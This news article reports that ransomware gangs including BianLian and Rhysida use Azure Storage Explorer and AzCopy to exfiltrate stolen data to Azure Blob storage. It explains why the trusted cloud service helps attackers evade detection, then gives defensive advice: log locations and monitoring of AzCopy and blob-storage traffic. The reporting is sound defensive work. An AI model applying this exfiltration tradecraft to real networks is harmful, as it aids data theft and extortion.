Cybercriminal groups, including the notorious BianLian and Rhysida ransomware gangs, have begun exploiting Microsoft’s Azure Storage Explorer and AzCopy tools to steal data from compromised networks, storing it in Azure Blob storage for later retrieval. This emerging tactic was identified in attacks observed by cybersecurity firm modePUSH, signalling a growing trend in using enterprise cloud services for malicious purposes.
Microsoft Azure Storage Explorer, a GUI-based tool for managing Azure storage, and AzCopy, a command-line utility for large-scale data transfers, have become key components in these ransomware operations. Threat actors utilize these tools to swiftly upload vast amounts of stolen data to Azure Blob storage, a scalable and enterprise-trusted cloud service. Once the data is securely stored in the cloud, attackers can transfer it to their repositories, evading many traditional security measures.
While using these tools, attackers are reportedly overcoming challenges, such as installing dependencies and upgrading to .NET version 8, to enable Azure Storage Explorer. The effort suggests an increasing focus on data theft, now the primary leverage in ransomware extortion campaigns.
Ransomware groups have historically relied on tools like Rclone and MEGAsync to synchronize stolen files with cloud providers. However, Azure offers unique advantages. As a trusted enterprise-grade service, it is less likely to be flagged or blocked by corporate firewalls and security tools. This makes Azure an ideal choice for discreet data exfiltration, as data transfers are more likely to pass undetected.
Additionally, Azure’s ability to handle large volumes of unstructured data at high speeds further appeals to threat actors aiming to exfiltrate substantial amounts of information in minimal time. modePUSH observed that attackers often use multiple instances of Azure Storage Explorer in parallel, accelerating the data upload process to blob containers.
Investigators noted that the ransomware actors left default 'Info' level logging enabled when using Storage Explorer and AzCopy. This creates log files in the %USERPROFILE%.azcopy directory, offering valuable insights for incident responders. These logs document file operations such as successful uploads (UPLOADSUCCESSFUL) and potential payload introductions (DOWNLOADSUCCESSFUL), aiding in damage assessment and response.
To defend against such tactics, cybersecurity teams should monitor for the execution of AzCopy, track outbound network traffic to Azure Blob Storage endpoints (e.g., ".blob.core.windows.net"), and set up alerts for unusual file copying or access patterns on critical servers. Organizations already using Azure are advised to enable the 'Logout on Exit' feature to automatically sign out of the application after each session, minimizing the risk of attackers exploiting active sessions for data theft.
As ransomware tactics evolve, organizations must remain vigilant, monitoring for unusual activity and leveraging robust cloud security practices to mitigate the risks posed by increasingly sophisticated threat actors.
